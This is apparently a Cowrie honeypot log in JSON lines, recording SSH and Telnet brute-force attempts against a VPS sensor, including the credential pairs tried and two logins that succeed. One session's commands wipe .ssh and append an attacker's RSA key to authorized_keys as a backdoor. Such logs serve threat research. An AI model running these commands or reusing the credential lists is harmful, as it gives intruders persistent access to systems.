{"eventid":"cowrie.session.closed","duration":"59.9","message":"Connection lost after 59.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:20.873356Z","src_ip":"212.227.235.229","session":"bf6bef825313"}
{"eventid":"cowrie.session.closed","duration":46.321340560913086,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:23.489610Z","src_ip":"212.227.125.160","session":"6dfeb2d49799"}
{"eventid":"cowrie.session.closed","duration":46.34028935432434,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:24.489714Z","src_ip":"103.77.214.206","session":"e03fe811f5f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57194,"dst_ip":"1.2.3.4","dst_port":22,"session":"effe9717356b","protocol":"ssh","message":"New connection: 212.227.235.229:57194 (1.2.3.4:22) [session: effe9717356b]","sensor":"my-vps","timestamp":"2025-08-31T05:06:34.620311Z"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:37.049620Z","src_ip":"212.227.125.160","session":"1ea0c90cbe3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52792,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1c62eac3da4","protocol":"ssh","message":"New connection: 212.227.235.229:52792 (1.2.3.4:22) [session: a1c62eac3da4]","sensor":"my-vps","timestamp":"2025-08-31T05:06:37.962861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:06:38.602595Z","src_ip":"212.227.235.229","session":"effe9717356b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:06:38.603352Z","src_ip":"212.227.235.229","session":"effe9717356b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:06:38.707163Z","src_ip":"212.227.235.229","session":"a1c62eac3da4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:06:38.707831Z","src_ip":"212.227.235.229","session":"a1c62eac3da4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56626,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ca1db7938cc","protocol":"ssh","message":"New connection: 212.227.235.229:56626 (1.2.3.4:22) [session: 8ca1db7938cc]","sensor":"my-vps","timestamp":"2025-08-31T05:06:44.263038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:06:44.263665Z","src_ip":"212.227.235.229","session":"8ca1db7938cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:06:44.530773Z","src_ip":"212.227.235.229","session":"8ca1db7938cc"}
{"eventid":"cowrie.login.failed","username":"server","password":"1234567","message":"login attempt [server/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:44.853166Z","src_ip":"212.227.235.229","session":"a1c62eac3da4"}
{"eventid":"cowrie.login.failed","username":"jj","password":"123456","message":"login attempt [jj/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:45.637523Z","src_ip":"212.227.235.229","session":"8ca1db7938cc"}
{"eventid":"cowrie.session.closed","duration":"38.4","message":"Connection lost after 38.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:46.348796Z","src_ip":"212.227.125.160","session":"1ea0c90cbe3a"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:46.696034Z","src_ip":"212.227.235.229","session":"a1c62eac3da4"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:46.906425Z","src_ip":"212.227.235.229","session":"8ca1db7938cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":12150,"dst_ip":"1.2.3.4","dst_port":22,"session":"5851ff62889d","protocol":"ssh","message":"New connection: 212.227.125.160:12150 (1.2.3.4:22) [session: 5851ff62889d]","sensor":"my-vps","timestamp":"2025-08-31T05:06:52.243218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:06:52.243997Z","src_ip":"212.227.125.160","session":"5851ff62889d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:06:52.324243Z","src_ip":"212.227.125.160","session":"5851ff62889d"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc","message":"login attempt [abc/abc] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:52.730193Z","src_ip":"212.227.125.160","session":"5851ff62889d"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc123","message":"login attempt [abc/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:53.812274Z","src_ip":"212.227.125.160","session":"5851ff62889d"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abcd123","message":"login attempt [abc/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:54.895081Z","src_ip":"212.227.125.160","session":"5851ff62889d"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abcd1234","message":"login attempt [abc/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:55.977464Z","src_ip":"212.227.125.160","session":"5851ff62889d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45870,"dst_ip":"1.2.3.4","dst_port":23,"session":"14c4cd325a57","protocol":"telnet","message":"New connection: 212.227.235.229:45870 (1.2.3.4:23) [session: 14c4cd325a57]","sensor":"my-vps","timestamp":"2025-08-31T05:06:56.403025Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:56.615265Z","src_ip":"212.227.235.229","session":"14c4cd325a57"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc1234","message":"login attempt [abc/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:57.059375Z","src_ip":"212.227.125.160","session":"5851ff62889d"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T05:06:57.821887Z","src_ip":"212.227.235.229","session":"14c4cd325a57"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:06:58.141079Z","src_ip":"212.227.125.160","session":"5851ff62889d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52102,"dst_ip":"1.2.3.4","dst_port":22,"session":"de8084501db3","protocol":"ssh","message":"New connection: 212.227.235.229:52102 (1.2.3.4:22) [session: de8084501db3]","sensor":"my-vps","timestamp":"2025-08-31T05:06:58.747152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:06:58.747845Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:06:59.020787Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42858,"dst_ip":"1.2.3.4","dst_port":22,"session":"26793d8fac09","protocol":"ssh","message":"New connection: 212.227.125.160:42858 (1.2.3.4:22) [session: 26793d8fac09]","sensor":"my-vps","timestamp":"2025-08-31T05:06:59.768040Z"}
{"eventid":"cowrie.session.closed","duration":3.689159393310547,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:00.092113Z","src_ip":"212.227.235.229","session":"14c4cd325a57"}
{"eventid":"cowrie.login.success","username":"root","password":"Y4k1nm4suk.2019","message":"login attempt [root/Y4k1nm4suk.2019] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:07:00.151864Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45882,"dst_ip":"1.2.3.4","dst_port":23,"session":"f907905ab76b","protocol":"telnet","message":"New connection: 212.227.235.229:45882 (1.2.3.4:23) [session: f907905ab76b]","sensor":"my-vps","timestamp":"2025-08-31T05:07:00.183122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:07:00.313309Z","src_ip":"212.227.125.160","session":"26793d8fac09"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:07:00.314009Z","src_ip":"212.227.125.160","session":"26793d8fac09"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:07:00.398165Z","src_ip":"212.227.235.229","session":"f907905ab76b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:07:00.419413Z","src_ip":"212.227.235.229","session":"f907905ab76b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:07:01.123268Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:07:01.124040Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:07:01.124932Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:01.398378Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:07:01.961855Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:07:01.962603Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T05:07:02.013188Z","src_ip":"212.227.235.229","session":"f907905ab76b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:07:02.237022Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:02.237936Z","src_ip":"212.227.235.229","session":"de8084501db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53616,"dst_ip":"1.2.3.4","dst_port":22,"session":"435d4cf392d5","protocol":"ssh","message":"New connection: 212.227.235.229:53616 (1.2.3.4:22) [session: 435d4cf392d5]","sensor":"my-vps","timestamp":"2025-08-31T05:07:02.509223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:07:02.510091Z","src_ip":"212.227.235.229","session":"435d4cf392d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:07:02.782118Z","src_ip":"212.227.235.229","session":"435d4cf392d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:03.042449Z","src_ip":"212.227.235.229","session":"f907905ab76b"}
{"eventid":"cowrie.session.closed","duration":2.8667495250701904,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:03.048317Z","src_ip":"212.227.235.229","session":"f907905ab76b"}
{"eventid":"cowrie.login.failed","username":"server","password":"1234567","message":"login attempt [server/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:03.126084Z","src_ip":"212.227.125.160","session":"26793d8fac09"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:07:03.911592Z","src_ip":"212.227.235.229","session":"435d4cf392d5"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:07:04.708668Z","src_ip":"212.227.125.160","session":"26793d8fac09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56795,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6ff8c4cee82","protocol":"ssh","message":"New connection: 212.227.235.229:56795 (1.2.3.4:22) [session: a6ff8c4cee82]","sensor":"my-vps","timestamp":"2025-08-31T05:07:04.845582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:07:04.846411Z","src_ip":"212.227.235.229","session":"a6ff8c4cee82"}
